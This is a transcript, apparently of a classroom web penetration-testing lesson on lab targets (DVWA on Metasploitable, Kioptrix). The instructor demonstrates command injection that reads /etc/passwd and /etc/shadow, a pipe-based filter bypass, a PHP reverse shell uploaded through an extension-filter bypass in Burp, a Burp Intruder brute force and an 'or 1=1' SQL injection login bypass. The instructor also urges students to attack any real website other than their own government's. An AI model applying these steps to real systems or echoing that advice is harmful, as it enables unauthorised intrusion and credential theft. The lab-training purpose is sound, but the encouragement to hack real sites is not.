For the web application attacking, we have a specific path in the cybersecurity that is known as web application penetration testing. It is about hacking
Okay.
the website or finding the vulnerabilities in the website and exploiting the same. That is known as penetration testing and specifically web application penetration testing. But in the
Okay.
CEH is like a combination of the modules which contains web application hacking, cloud computing, SQL injection, and some other parts of different cybersecurity paths. So in the CEH,
Okay.
we have a small path of this web application penetration testing. In this, we will see how we can hack a website using remote command execution attack, which is known as command injection, how we can hack a file
Okay.
upload vulnerability attack, and secondly, how we can apply a brute force attack on a login page with the help of WebSuite. That we will see. Okay.
Okay.
So for this one, as it is like a illegal, it is like an attack, and we cannot hack any website. So we will try a vulnerable website, which is Metasploitable only. So after
Mhm.
turning on the Kali, open the Metasploit. Metasploitable is a server, and we already know how we can hack this server. But in this server, there's a website which is also hosted. So in this session, we will hack that website with the help of file upload vulnerability and command injection.
Mhm.
So first, we will collect the IP address of the target machine with the help of net discover.
Okay.
So IP address is 192.168.137. Now, we can start with the nmap scan. So we will do the nmap basic scan, nmap hyphen SV for the version scanning, hyphen A for the aggressive scan, hyphen T for the for increasing the number of threads, and hyphen O for the operating system. In the target IP. Sorry, this is not the target, this is Kali IP. Here we can start net discover to scan the target IP. So the target IP is 192.168.139 because here we can see the
Mhm.
host name is VMware. So basically Metasploitable is inside the VMware only. So that is why IP address is 192.168.139. And here we can apply the nmap scan now. So the first attack we will apply is command injection attack. Command execution, or we can say
Mhm.
remote command execution attack, or we can say the command injection. It is a kind of attack
Yeah.
where we are attacking the server of the target machine. Okay, in this attack, if the target is vulnerable, then we can apply the attack, otherwise not. Now, in this attack, attacker send a, we can say a malicious command to the server, not to the website, to the server, which means a website is accepting the commands from the attacker, executing the commands on the server, and showing the response on the display on the web page to the attacker. So that is known as the command execution. In this way, we can check out the official files, or we can see the credentials or some important files which is on the server of that website. Okay, that we will see. So, but for now, here we can see this is the result of nmap scan. And here you can notice port number. See, port number 8180 is open, which is HTTP, right? Port number 80 is open, which is of TCP, again HTTP. So if you see any port like 80 or HTTP open in any kind of Nmap scan or any kind of server scan, then we can assume that there's a website which is hosted on that particular server. Okay, and how we can check the website? We can open the browser and we can put the IP address of the target machine in the browser so that we can check out the target website. And here we can put the IP address, which is 192.168.139. Okay, so this website is hosted on the target server, which is Metasploitable. And here we have to click on this last second option, DVWA. Okay. So again, it is a vulnerable website which is made for practice only. Like the attackers can practice on this website.
Okay.
So here it is asking for the username and password. So the username and password is written here, which is hint. Default username is admin and password is password. So here we can apply as a username admin and password is password. Now in this website, we can apply different types of attack. Here we can apply brute force attack. We can apply command execution attack. We can apply CSRF attack, which is cross-site request forgery, file inclusion attacks, SQL injection blind, and so on. So here we have specific settings which we can do. First, here click on this DVW security. Here we have three securities, which is high, low, and medium. In the low security, we can easily hack the website. That is common. In the medium security, we can we cannot easily, but we can bypass the security of the medium level security that we can bypass, which means in the low security and high medium security, we can bypass or we can hack the website. But in the high security, we cannot hack the website because in the high security, the website is fully secured. Or we can say in the high security, the website is secured in one way, not in another. For example, let's say there's a website, e-commerce website, and there's a search option. In the e-commerce website, we can also apply SQL injection, and in the e-commerce website, we can also apply another type of attack. So maybe the website is secured with the SQL injection, but not with the other type of attack. That is possible. Or maybe the website is secure with the two types of vulnerabilities, but unsecured with one type of vulnerability. So there's like a many vulnerabilities in a single website. So if there's a high security, we can say this website is secured with one vulnerability, but vulnerable with another vulnerability. Okay, we can say that because there's a website is never fully secured until you find a zero-day attack or a vulnerability in the website. So here we can first try with the low security, then we will try with the medium security. And after click on this low security, click on sub. Okay, now here you can see security level is currently low. Now we can click on this command execution. Now here we have this web page, which is asking for ping for free, enter an IP address below. So it is asking for an IP address, which it will ping for free, which means, let me open a terminal here. So this is same as this terminal. Okay, for example, if I open a new tab here, here we can ping any website, let's say google.com or any IP address, let's say localhost IP. So we can ping any IP here, which means my machine, there's a kernel which is helping to ping this IP address. Okay, also there's a network manager which is helping my system to ping this particular IP address, which means we are putting this IP address in the terminal, in the shell of my system, of this Kali Unix. The same way we are applying here. The website in the front end. So the website has three parts, front end, back end, two parts, front end and back end. In the front end, we have the UI, like the designing.
Yeah.
In the back end, we have the functionality of the website, like how the website is behaving, how the website is communicating with other servers, how the website is communicating with the database. So this
Yeah.
is front end. Here we have this designing. In the designing part, in the front end, the website is asking for putting the input. So here we can put our input as a IP address. And then we can click on submit. So this website will ping this IP address for free. Okay, now here you can
Okay.
see we have the result. So this is the same result we are getting here. You can notice the same result. Okay, like it pings like 3 packets, shares 3 packets and receive 3 packets with 0 packet loss and some other information, which means website is accepting the commands from the user. If the website is accepting any kind of input from the user and executing that particular input, which is given by the user on the server, and then representing or displaying the output in on the web page, that particular website is vulnerable to the command injection attack, or we can say command execution, because the website is accepting the input from the user and then taking that input, executing on the terminal of its server. Okay, like here, the website is picking up the IP address and executing this command in its own terminal and also showing this particular command, this particular result on the web page, which means in place of this IP address, we can put any other command. For example, we can put this command also, pwd, right? We can put this command also, because after all, the website is accepting this command, the whole command as a whole, and also executing on its own terminal and showing the response, which means that the website can accept any number of commands from the user. So this particular attack is known as command execution attack or command injection. Is it clear?
Yeah, that's clear.
Okay, now how we can execute? See, even we have this benefit of this vulnerable website is we can check out the source code of this website. Now this website is made up of PHP in the backend. So we can check out the source code. You can click on view source. Like why this website is accepting any kind of command. So here, see, we have this PHP source code. It is very simple. If you don't know PHP, again, it is simple. We have this PHP. Okay. It is an open tag here. And here we are asking if is set. We are sharing the post request submit. Like if someone click on this submit button, then do this. Otherwise, do nothing. Then inside this if statement, we have this code here. It is first taking IP from the user and storing that IP in this variable. Okay, it is a variable like a container which store your value. So in this target container, we have the IP address. And then here we are checking if this target means the IP address is matched with this condition, then ping it. Otherwise, ping here, which is it is asking for ping from the Windows or from the Linux. Okay, and here you can see we have the specified packet here. That is ping -c for number of packets, which is number of countable packets, 3, and then target IP here. So we have this whole command. Now this whole command is going in the backend on the server, and the server is executing the command and displaying the output here with the help of this echo command. Echo, and whatever the result is, show here in the form of this variable. So now what we can do, we can simply check out if this website is vulnerable. So we can type here pwd and click on submit. Now you can see this website is not taking our command. If I put pwd, it is my machine is taking my command, but my website is not taking, because the basic nature of website is to take the IP. So first we have to put the IP address, and then we can put a semicolon here, and then here we can put pwd, and then click on submit.
Okay.
Now you can see we have the result here. We have this path here with the IP address result. The path is which we are inside is where www this location www vulnerabilities exe. Okay, which means we can combine 2 commands together. For example, like here, we can ping a website also, and we can put a semicolon, and here we can also check out the path like this. And you can see home Kali is my path. So we can execute multiple commands together. So with the help of this particular functionality in the server, we can execute the server. Okay, now we can run any number of command here. We can just mention the IP address, and then here we can put, let's say, ls for listing the items in the particular directory. So these are the items, which is help, index, PHP, and source. These are the items in the current directory. Now we can do any number of operation. We can check out any file, we can read any file. But what is important is to check out the file which is inside the etc folder. For example, we can check out here cat/etc/password. So this one is a confidential file in the Linux. This password file contains all the usernames of your Linux. Okay, important usernames. So here we can click on enter. So you can think of it as a very confidential file. etc password. So we have this root user in my machine, the other users as well. Okay. So this will contain the list of all the usernames. And then we have another file which is etc shadow, which contains the password of those username. Okay. So we don't have permission. We can become a sudo root user here. Sudo. So, and then we can check out cat/etc/shadow. Shadow file contains the passwords. So these are some passwords here, which is, this is the password of my root in the hash format. Okay, and it will show all the passwords which are in the root in the shadow file. So shadow and password are important files. So if you can able to see these files, which means the website is fully vulnerable, then you can do any number of operation. And here the mission is our to check out if the website is vulnerable or not to hack the entire website. That is our mission. Because as a security developer, you have to check the website, not to actually hack the website.
Yeah.
Okay. So here we can simply put here the IP address 127.0.0.1, and here we can check out if we can able to check out the official file. So here we can use cat/etc/password and click on submit. And here you can see we have the result of the entire password file. Okay. Same as we can check out the shadow file, but shadow file is not there inside this particular machine. Or we can check out if it exists because of the update. So we can, in place of etc shared password, we can put shadow here. So we don't have that result from the shadow file because maybe the shadow file is it may be in the different directory, or we can say it does not exist in the target server, or maybe it exists but in the different name, like with a different name. Or secondly, we can also say we don't have the permission to read out the shadow file. It can be any number of reasons. But overall, we have successfully hacked this website. Now we are fully sure that this website is vulnerable to the command execution attack because we can able to read the confidential files which is in that server with the help of this vulnerability.
Yeah.
Okay, so this is simple with the low security. Now we can try with the medium security. And we can check out the difference in the source code. So in the low security, we can put medium security and click on submit. And click on command execution. Here we can again apply the IP address and then again our command which is pwd and click on submit. So this is a medium security, and here you can see if I apply the same command which I am applying before, which is 127 etc password. Okay, the same command before, and when I click on submit, it is not taking my command. Why? Because we can check out the source code here.
Okay.
See, in the previous source code, there's no filter. No filter means previously this website is accepting everything, like the semicolon, the colons, everything. But here in the source code, you can notice the website is rejecting the substitutes, which is this ampersand and this semicolon, which means we cannot apply semicolon and this particular %, in the command. So this is known as a filter here. You can see remove any of the character in the array. like in the blacklist. So these are all blacklisted. We cannot use ampersand and colon here, semicolon,
Okay.
because they are not allowed. Okay, now what we can do in place of semicolon or ampersand, what we can do to bypass this security. So here, so in place of this semicolon, we can put a pipeline. This is another way, just putting a pipeline. So let me show you here. So here we can ping any website. Let's say we can ping a local address. And here we can put here a pipeline. And here we can put freedom. So this is another way of using multiple commands. In this way, this command will be ignored, and this command after pipeline, whatever will be, it will execute it. So we can apply, we can try this mechanism to bypass the medium security. Because in the medium security, we cannot allow, we cannot use semicolons or ampersand. So here we can use again 127.0.0.1 and pipeline, and then we can use cat etc hyphen password / password. And you can see the attack is successful. We can able to read the password file,
Okay.
which means whoever developed this website in the medium security, they are not fully knowledgeable, like they are not fully aware about the bypass mechanism which which an attacker can use. They have put a like a security mechanism by putting a semicolon or ampersand, but they cannot, they haven't mentioned that a pipeline as a another mechanism, like as another attack mechanism. So the semicolon is our bypass mechanism here. Okay, this pipeline is like our bypassing mechanism.
Yeah.
Okay. Because in the source code, we have this only two mechanism, which is ampersand and semicolon. Now here we can check out. Now we cannot hack the high security, but we can check out the source code of high security. Like why it is high security, or why we cannot hack this like website or this attack in the high security. So if you click on the page source, you can see here. Now in the high security, the developer checking each and every part of the IP address. Here you can see it is checking for octets of the IP. Here you can see split the IP into 4 octets. Check if each octet is an integer, like is in the numeric form. So here we have this octet 0, 1, 2, 3, and 4. Okay. So we can check if all 4 octets are input the IP address back together. Which is if all 4 octets, 4 parts of the IP address are in the numeric format or in the number format, then put the IP address all together. Okay, otherwise ignore that part. Okay, that is the security mechanism here. In this particular mechanism, it is same as like a whitelist rule. In the whitelist, we are checking the IP. Like we are checking the entire IP address. We are checking if that particular IP, if each and every part of that IP is fully numeric or not. If it is numeric, then allow it. If it contains any other part, like any special character, any alphabets, then block it. So that is why we cannot hack this website. Is it clear this much?
Yeah, this much is clear.
Okay, so this is known as command execution attack. Now we can apply another attack which is known as, give me a second. Yeah. So now we can apply a file upload vulnerability attack. So in this file upload vulnerability, let's say there's a web page. Okay, let's say there's a website, abc.com. And the purpose of this website is, let's say, to convert a Excel file or let's say a simple test file into PDF. That is the purpose of this website. So for converting our test file into PDF, we have an option here in the website to upload a file. Like here, we can upload a file. So if the website is vulnerable, so we have two cases. If the website is vulnerable or if else not. So if the website is vulnerable, which means we have an option of uploading a file. If the website is vulnerable, we can upload any kind of file, like any sort of file. And every sort of file is allowed by the website, which means we can upload any malicious file like PHP. Like if the file is malicious, we can upload Python file. We can upload any malware of any extension, which means this means website is vulnerable, which means the website is accepting all sort of files. Okay, if the website is accepting PHP file, Python file, like apart from the file, apart from its own purpose, which is test file, then this website is vulnerable. And if the website is not allowing any kind of file apart from TST, like in the website, you can only upload TST file, which means the website is not vulnerable because the website is not permitting any kind of file apart from the TST file, which is the main purpose of website. Okay, so this particular attack is known as file upload vulnerability. It is like a way of identifying if the website is accepting all sort of file apart from the TST file, which means the website is vulnerable. Because in place of TST file, our attacker can upload a malicious file, a malicious PHP file, a malicious shell file, a malicious bash file, any file. But if the website is not vulnerable, so website will not permit any kind of file apart from TST. Okay. And if the attacker can upload any file, so the attacker upload a shell file, which will access, which the attacker can access a shell or a terminal of that particular server where the website is hosted, right? So this particular attack is known as file upload. So we will see in this website. So we have this option of first we will click on the security. So again, we have this three security, low, medium, or high. We will see the low security, which is very simple. Then we will see the medium security, like how we can bypass so-called mechanism in this website with the help of medium security, and we cannot hack in the high security. Okay. So click on submit and click on this upload here. So here it is asking for choose an image to upload. So what we can do, we can check out an image. So we will open our terminal here and we can install an image. Let's say images. Okay, so let's now load this image. Right click and save image as. Okay, so after downloading the image, we can click on it is a JPG image. We can click on browse. First, we will check if the website is uploading, like permitting any image or not. It will, because that is the basic nature of the website, uploading or taking image as an input. And we can click on upload. Okay, now here you can see this one more vulnerability in the website, which is first, the website is taking the image. That is not a vulnerability, but the second vulnerability is it is showing the path where the file is stored. So the file is stored inside this path. Hacky will inside uploads this is my file. So this is a second level of vulnerability, which is the website is showing us that in which path it is storing the files. Okay, so the website is permitting the images. Now in place of this JPG, we can check out any other file if the website is taking any other file or not. So we can select any file. Let's say we can select this document or this simple file. It is a very large file. Let's say this file.pcap, and we can click on open. Okay, like we are just checking if it is taking any other file apart from JPG or not, or image or not. So here you can see successfully uploaded, which means this website is vulnerable because the website is taking every sort of file. So now as an attacker, we can upload any malicious file, which means we can upload a malicious file. So for the malicious file, you have to install one. So you can search for PHP monkey. You can search a PHP shell. Pen test monkey. Yeah. Here we can search for. You can search for pen test monkey PHP reverse shell. Okay, let me share the URL in the chat. So you can click on this URL, and here you have to install this file, which is PHP reverse shell, this image dot zip file. Okay, after installing, we can open the file manager. So you have to extract this file.
Yeah.
So we can click on downloads. And here we can right click and we can extract here. Okay, so inside this file, inside this directory, we have this file, PHP reverse shell, which will give us the reverse shell. So what we can do, we can right click here and we can open with mousepad. So before uploading, we have to modify some changes here. So here, first we can find out the IP address of the Linux machine, which is 192.168.137. So again, it is a reverse shell. Reverse shell means the target machine will share the reverse connection. So here you have to change line number 49, which is, give me. Yeah. So here we have to change line number 49, which is asking for the IP address. So here we have to put the IP address of the Kali machine or of the attacker machine, which is 3937. And then the port number. You can change the port number if you want, but here I am putting this port number only 1234. Okay, and click on save. Now, before uploading, you have to make these changes and then we can upload this file. So for uploading, simply we can click on browse. We can move to the location where the file is located, which is in the downloads inside this PHP reverse shell, and click on open and click on upload. And here you can see PHP reverse shell upload successfully. Now, which means now we can access the shell of the file, shell of that particular server with the help of this file. So for this, you have to first move to the location of this file where the file is uploaded. And the second vulnerability is the location is also displayed here, which means we have to move inside Hackable uploads, and here we can find the file. If the location is not available or not displayed in the website, then you can use the directory buster for finding how many files or folders are there. One of the folder contains the files. Then you can open that location. Okay, if the path is not displayed, but in our case, the path is displayed, so we have to move inside Hackable. Before Hackable, we have to move inside another directory, like back and another back. So 2 times back, which means we have to move inside this location. We can use here Hackable /uploads. So this is the location where all the files are located. And here you can see this is our file, PHP reverse shell PHP. Okay. Now here we can open the listener here, which is NVLP and 1234. So this is a listener. Listener is like, it is like a reverse shell, which is the connection request will come from the target machine. And here we are as a attacker machine, we will receive the connection. That is a reverse shell. So for receiving the connection, we need a listener. So here we can click on enter. Now listening on this port number 1234, this is the same port which we have used here and the same IP as the Linux IP. Now we can simply, if I click on this file, the listener will start. So if I click on this one, you can see this will keep on rotating. But here in the terminal, we have this shell. So this is the shell of, target machine. So who are we? We are inside the target machine and here we are this user. So we are inside the MSF, this metasploiting machine. Okay, now we can check out anything. We can move to any other location. Okay, so these are the files and directories inside root user. Okay, so we are the root user here. Not root user, but we are the root permission here. Because we can move inside any location. We can check out anything, we can read anything, we can write anything, we can modify anything, and so on. So here we can do any number of operations. Okay, we can get this file, .txt.
Yep.
Okay, so we don't have permission, but we can copy this file into any other location and we can also upgrade our permission here, sudo sudo, and so on. Basically, we are inside the target machine with the help of this particular file. Okay, and this is known as file upload vulnerability. So you can see the file upload vulnerability and this command execution. These are very high level vulnerabilities. Like the CVT level is very high because we are gaining the shell of that machine, shell of the server. And that is the last stage of hacking. If we are getting the shell of the target, then you can see we have hacked the entire machine, entire server. Because if you are inside any machine, you can do anything, any number of operation, right? So that is why these two vulnerabilities are very high level vulnerabilities. So this is in the low level security, this file upload. Now we can go back. We can try this in the medium level security. And before that, we can check out the source code here. In the low security, you can check out new source. So you can see in the low security, there's no mechanism. There's no mechanism of protecting the website. Okay, like here you can see it is asking for any file and it is also putting the file in this particular path and then it is checking for the file and putting the file inside that path. Okay, and then showing the message if the file is uploaded or not. So if the file is not uploaded, your image was not uploaded, or if it is, then successfully uploaded. So there's no mechanism, but in the medium security, we have one mechanism here, which we can also bypass.
Yep.
Here we can click on medium and click on submit. And we can click on this upload here. And before this, we can check out the source code. So here you can see there's a mechanism here, which is, it is checking for three types of files, like three parts of the file. First, file name, file type, and file size. Okay.
Yeah.
And it is saying that if the file type is image or JPG, then, and if the file is less than this particular size, then upload it. Otherwise, don't upload it. Okay. So otherwise, if file is not JPG, we cannot upload. Your image was not uploaded here. So this is a mechanism, which means it is a filter mechanism here, which is website is only permitting images, JPG file, not any other file. Like even this website is not permitting any PNG file, which is also image format, but it is not permitting any PNG file, any other file, but it is only permitting image/JPEG file. Okay, so how we can bypass this mechanism? So we will see that. So here, if I try to upload any other file, let's say our same file, that reverse shell, if I open this and upload here, you will see we have this warning here. Your image was not uploaded. Let me refresh. If we try to upload any other file, like PHP, upload. Okay, here you can see your image was not uploaded. Okay, which means we cannot upload a PHP file here. This is a JPG file. We can try this
Yep.
file. Okay, so we can click on browse on desktop. We can select this JPG file. And here you can see it is successfully uploaded, which means only
Yeah.
images are allowed. Apart from images, nothing is permitted. So we can
Yeah.
bypass this mechanism. And how we can bypass? We can bypass with the help of verb suite. So now we will open the verb suite. And we can click on OK here.
Okay.
Now how we will use this verb suite here? See, in this mechanism, in this medium mechanism, we will bypass this. For example, we are sending the request of uploading a file, let's say this PHP file, PHP reverse shell.php. We will upload this file, and before uploading this file, we will check out this request, the request of this particular file, and on the fly, like on the fly, which is we will capture the request of this upload in the verb suite, and on the fly we will change the PHP. Sorry, we will upload this file php.jpg. On the fly, we will change the PHP into like we will change first the PHP file into JPG like this one. And then on the fly, we will remove this JPG from the end. And then we will upload simply the PHP file. That is our mechanism. Okay, so let me. So we can start the verb suite. So first we will change the name of your file. So here we will right click and we click on rename. Now instead of PHP, we will put here .jpeg. Now this becomes an image here, php.jpg. Now this is allowed, but we cannot gain access to the shell with the help of this image because it is an image now, not a PHP file.
Yeah.
Okay, so what we will do? First, we will upload a certificate here because let me make some changes. So first we will apply the proxy here. So proxy is 127.0.0.1 and port number is 8080. And then click on this option. And before that, we will upload a certificate, which is SPTP work suit. And here click on the authorities and click on import. And click on the downloads. Okay, now here, before uploading, we will choose the file. So click on browse and click on your file, which is in the downloads, that JPG file. So this is the name of my file, which is php-reverseshell.php.jpg, and click on open. And before uploading the file, open the proxy interceptor. Now the interceptor is on, and here we can click on upload. So before uploading, we have this request of this uploading file. And here you can notice we have this file name. And here you can also check the content type, which is JPG. Content type, image, and JPG. Now on the fly, means we are changing the request on the fly. And here instead of the JPG, like php.jpg, we can remove this JPG from the end. Now we have this reverse shell.php. And then we can click on forward here. And then interceptor is off. And here you can notice the file, which is php-reverse shell dot php successfully uploaded.
Yeah.
Okay. Okay, so file is successfully uploaded here. Now we can again open the listener here, which is like this one. Okay, so now here we can move to this location where the file is uploaded here. And here we can search for hackevil/uploads and entry. And here we can click the file, which is PHP reverse shell, which we have uploaded now. And here you can notice the listener, we have get the shell. And here we can type who am I, like this. So we are again inside the target mission. So this is like a mechanism we have bypassed. WebSuite is a very important application for web application penetration testing. With the help of this WebSuite, you can do any number of operations. You can find the vulnerabilities. You can find out many you can find out the headers of the requested. You can manipulate them. You can do any number of operation. Okay. So we can do any number of operation. Okay, so WebSuite is a very important application if you are in the web application penetration testing. WebSuite is like a main application for finding the bugs in the websites, in the Android applications, or in the iOS application, or in the APIs. Is it clear this much?
Yeah, that much is clear.
Any questions?
It's all right.
And if you check out the source code of this particular medium security, you can notice it is only checking the here you can see it is checking the external part of the file, like the JPG only, the outer extension, not the inner extension, which is PHP also.
Yeah, yeah.
But if you click on the high security here, why we cannot hack the high security? Because we can check out the source of the high security. In the high security, it is checking for everything. It is checking for the each and every extension after dot. It is checking first, it is permitted only the JPG, JPEG files. Okay. And then it is checking after the dot. Okay, upload name, you can see here, after dot here. So it is checking. So this mechanism will check this name also and this name also. So that is why in this case, we cannot bypass this security mechanism. Okay, but in the previous case, we can bypass because in the previously, it is only checking this part, not this part.
Yeah.
Okay. So this is how we can apply file upload vulnerability. You can check out, you can also apply in the real-time websites. Okay, again, don't hack your own country's website and don't touch the government website. Apart from that, you can hack any website, which is even not like secured. You can try it. So before, and you have to try the attack, then only you can find out if the website is vulnerable or not. Without trying, you cannot check out. Okay.
Yeah.
Next here, we can apply a brute force attack using websuit. That we have already seen, like how we can apply a brute force attack with the help of websuit. Okay. So we can revise this attack here now, like how we can apply the so we can apply a websuit brute force attack using websuit.
Okay.
So first we will visit a simple website, let's say test PHP website. So we will apply the attack here. So here we will apply any sort of username, let's say admin, and password is 12345. We are not sure if this is the right username or password, but here we can see here the sign up page is disabled and it is like a test website, like where we can apply the attacks. So here you can see, please use the username test and password test as a username or password. So the actual username and password here is test and test. Okay, so now we know the actual password and username because this is like a practice attack. So we can put this username and password in the word list. So with this attack, we've already seen like how we can apply. So we are just checking it one more time. So we can use this test and test in the word list. So before clicking on login, we will intercept this request. So turn on the interceptor. And here we can click on login. So we have this username and password. And here we can click on action and send to intruder. Intruder is mainly for applying a brute force attack. And here we can turn off the interceptor. In the intruder, we can apply username as admin and password is here. So before doing anything, we have to click on clear here. Okay, clear. And then we have to highlight the part where we want to apply a brute force attack. So we can highlight the admin first, which is a username, add, and password here 12345. So here we are applying the attack on both parameters, username and password. We are assuming that we don't know the username as well as the password. Okay, so after highlighting the admin and password, we can click on attack type as cluster bomb. Cluster bomb is mainly for applying the attack on both parameters, on multiple parameters. Then we have sniper. Sniper is only for if you are applying attack only on one parameter. So we will select cluster bomb and click on payloads here. In the payloads, we have to apply a word list and where we can get the word list from. So for the word list, we can search for sec list. We can click on sec list, word list. Sec list is like a famous word list. So if you're hacking anything, so you can simply check out the sec list. And here we have multiple word list. So we can click on the passwords or username first. In the username, we can check out some common names, which is top username shortlist.txt. So these are some common username. So we can click on copy raw file here and we can apply here. And we can click on paste. So in the payload set, you will get two parameters, one and second. First for the username and second for the password. So we can click on one and click on paste here. Okay, then we can click on the payload set second and we can check for the passwords. So for the passwords, you can click on passwords here. And here, you can check out some common passwords. So this is like a very large word list. So we can make
Yeah.
it short. We can take some small part from this word list. Okay, like this much. Because the larger the word list, longer it will take to brute force. So here we can simply paste the word list. And here we can also add the right username or password. The right password is test here. So we can write here test and we can click on add here. So this is the password. Now we can apply the attack. So here we have this password and here we have this word list. So we can click on start attack. So now we will check for the right username and password. So here you can check. This is payload number 1, which is our username, and payload number 2 is the password. So it is matching the password with each and every username until it finds the real username and password. What we can do, we can make this word list a little bit of short because this will take more time. Okay.
Okay.
So let me discard and we can just remove some part from the word list. Okay, so we have removed this part and then we can start the attack.
Okay.
Now here we have this combination of attacks, which is 119. So this much is clear, like how we can apply the fireupload vulnerability and how we can apply command execution attack.
Yeah, that is clear.
So in the meantime, we can download the Qpatrick's machine. So we have already seen how we can hack the Qpatrick's level 1. Today we will see how we can hack the Qpatrick's level 2nd. Okay, so you can search for the Qpatrick's level 2 download, and here you can click on this first URL, which is Qpatrick's level 1.1, which is level
Yeah.
number 2nd. 1.0 is like level number 1, 1.1 is level number 2nd. Okay, hash 2nd. And here you can click on this mirror image, the last one. Okay, this is the updated RAR, which is updated zip file. If you download this first mirror image, this is the original. And if you try to hack the original, so original has some default. So that is why, sorry, some fault. So that is why we cannot hack this original one. So we will going to hack this updated one, which is new updated file. Okay, so you have to click on this last mirror image. And after downloading, we can simply unzip and we can add here. So in the meantime, we can close this machine. Okay, so now click on show in folders and here we can unzip this file. So right click and here we can click on extract to Qpatrick's. And here we can click on file and click on open
Okay.
and click on the downloads. I think we have Qpatrick's already. Okay, and click on the Qpatrick's and this CentOS file and click on open. And then again, we can make some changes here. Click on edit virtual machine settings, which is here. We can click on this network adapter in the bridge mode and click on OK.
Okay.
And click on power on this virtual machine. So for hacking this machine, again, we will follow a methodology, which is we will start by remembering some points, which is first is who is our target. So the target is our server. Secondly,
Mhm.
what is the purpose of hacking this machine? So we want root access. Third, what kind of tools and technologies we want to use. So we will going to use some important ones like Nmap for scanning, Net Discover for finding the IP address, Metasploit we can use, and so on. Rest we will see,
Okay.
okay, etc. Then the methodology starts with the information gathering. We will start the information gathering first, then we will move to scanning, then simply gaining access. This is going to be our methodology.
Yeah.
And here you can see this attack is finished, which is brute force. Now, how do we find the real username and password? So we can click on this status code here. And we can go on top. So here you can see the status code. Everything is 302, but one status code is 200. And even you can see the length. Every length
Yeah.
is same except one, which is unique here, 6204. 6204 is a unique length here, and 200
Okay.
is a unique status code here, which means this is the right username and password. So once you
Oh,
find
okay.
the unique status code and unique
Mhm.
length, that will be your username and password. Okay, so now we know the username and password, so we can simply log in here using test and test and click on login. Okay, now we are inside the target machine. Is it clear how we can apply brute force attack?
Yeah, yeah, that's fine.
So first is we will find the IP address of this Qpatrick's machine. Here we can use net discover. Okay, so for going inside this machine, we can click here. So now we are inside this machine, and for moving outside from this machine, like moving your cursor outside of your machine, we can press Control Alt. Okay, here you can see the warnings here. Control G for moving inside this machine means your cursor inside this machine, and moving outside from this machine, we can press Control Alt. Okay, and here we can read the challenge of the Q-Patrix, which is the Q-Matrix VM image are easy challenges. The object of the game is to acquire the root access via any possible means, except actually hacking the VM server or player. Okay, so here the purpose of these game are to learn the basic tools of technologies in the techniques in the vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenge. And here we have some information about the hashes. If you find any machine like vulnerable or malicious, okay, like especially malicious, then you can copy the hashes and paste inside virus total, because some machines may be malicious. Here these are not malicious, but maybe out of 100 one machine may be malicious. So for before installing any other machine for practice, you have to copy the hash, okay, like the original hash and the re-release hash, and then upload on the virus total to check out if that particular hash, whether it is original or re-released, check out, and check out if that machine is malicious or not. If the machine is malicious, don't install it, and if the machine is malicious, just don't install, and if the machine is not malicious, install it. We can try this again. Okay. With the net discover, we can also run the angry IP scanner. Okay, so we can run both. And here we can mention the range. Maybe this is the IP address of the Q-Patrix, because 137 is IP of Kali, 138 Linux, sorry, of my Windows, and 33 may be the IP address of the target. So we can check out, we can verify by opening the website which is hosted on this IP address. Okay, so we can 33 is not working. We can check out 37. 37 is not working either. We can check out here. 192.168. Three must be the IP address of Kubernetes. So we can try to ping this IP address first. We can check if the machine is even working or not. D3. Yeah, the machine is working. We can apply the nmap scan here. The same nmap scan. The machine is in the ignore states. We can do one thing. We can close this. So we have removed the old machine and I have just installed the new image. Now we can try to scan again. Let's see. We
Okay.
can scan using
Mhm.
Angry Scanner, and we can also scan using Net Discover. Yeah, now this is the IP address of the target machine, which is 41. Okay, again we can verify by putting the IP on the browser. 468 941. Yeah, so this is the IP address of the target machine.
Okay.
Okay, now what we can do is, even you can check out from here in the Angry IP Scanner. 41 is something. Okay, here you can notice it is running web detect CentOS, and CentOS is our server. Okay, now what we can do, we can start with the nmap scan, nmap, and 341. First, we will scan how many ports are open, and we will target the open ports first. And then after targeting open ports, we will check if the website is vulnerable or not. And here we have noticed that after applying the IP on the browser, there's a website hosted on this server, which is asking for the username and password as a remote system administrator login. So how we can bypass this login page? Because there's no sign up option. So we cannot sign up. There's only one
Okay.
way. Either we can apply brute force, or secondly, we can bypass this login page. So do you know any way of bypassing this login page?
Not sure.
Like how we can bypass the login page? Do we
Mm,
have any attack for this?
uh,
We can use SQL injection login bypass, right?
oh, okay. Yeah. Understood.
So here we can try that. We are not sure if this web page is vulnerable to SQL injection or not. The best way
Okay.
of knowing is to try by yourself.
Mhm.
Second option,
Mhm.
you can also use this. You can scan this website with the help of Zap or WhatsApp
Mhm.
or Nexus. So you can use any
Yeah.
application. So how we
Mhm.
can bypass? We can create a payload here by using admin/1. No, sorry, or quotation 1 equal 1. We can use this payload here. So copy
Mhm.
this and apply.
Mhm.
Same with the password and click on log,
Mhm.
and boom. So the website is vulnerable. The login page is vulnerable with the SQL injection, and we have successfully bypassed the login page. So first vulnerability which we have find out in the login page, which is vulnerable to SQL injection login bypass mechanism. Right now, website is asking for ping a machine on the network. So what we can do here, we can simply put our IP address first. And before hacking into any website, check the website, explore the website. Okay. Now here we have put the IP address here, and then here we have the result, which means the website is taking our command as an input, like the IP address, and ping it using its own server, and then displaying the output here, which means we can try some other attack here. Let's say we can apply this one here, UWD submit. We can check out. Yeah. So here you can see after ping this particular IP address, it is also showing the path where we are. We are inside where? www or HTML. So we are inside this location, which is the server location, which means the website is vulnerable. So the second vulnerability is, so this is first. Second is, it is vulnerable to command execution, or we can say command injection attack.
Mhm.
Okay, because we can input anything, we are putting a command with the IP address and the display, and the website is displaying the output here on the web page. So this is nothing but a command execution attack. And even here you can notice after scanning the website, we have noticed something here like port number 22 is open, which is SSH. Port number is 80 is open, where this Apache is running, this version of Apache as a service. Port number 111 is open, port number 443 is open, and port number 631 is open. MySQL is open, and this is the MAC address. This is a device, Linux here. Okay, now here you can notice the Linux kernel. We are having the exact Linux kernel, which is 2.6, the exact version 2.6. Okay, as you know, Linux is different from Linux kernel. Linux is a combination of Linux kernel and a GUI. Okay, so here we have this Linux kernel, which is 2.6, and OS details like operating system may be in the middle of, in the range of 2.6.9 to 2.6.30. Okay, so we have enough information. Rest we can also run here the buster to check out how many directories are there. So HTTP :// IP address of the target machine. So we can check how many directories, how many files, how many web pages are there in the target machine. So here you can notice that we have some files like which are not important. This CGI is important, but we don't have the permission to go there. Then we have this index PHP, we have this manual. Manual is a directory here. Okay. Inside this directory, we have this usage as a file. Then we have these files inside manual, which are not important because it is a simply a manual. So this is again not important for us. Rest we have this license file, which is again inside manual. That is why it is not important, and so on. So right now we 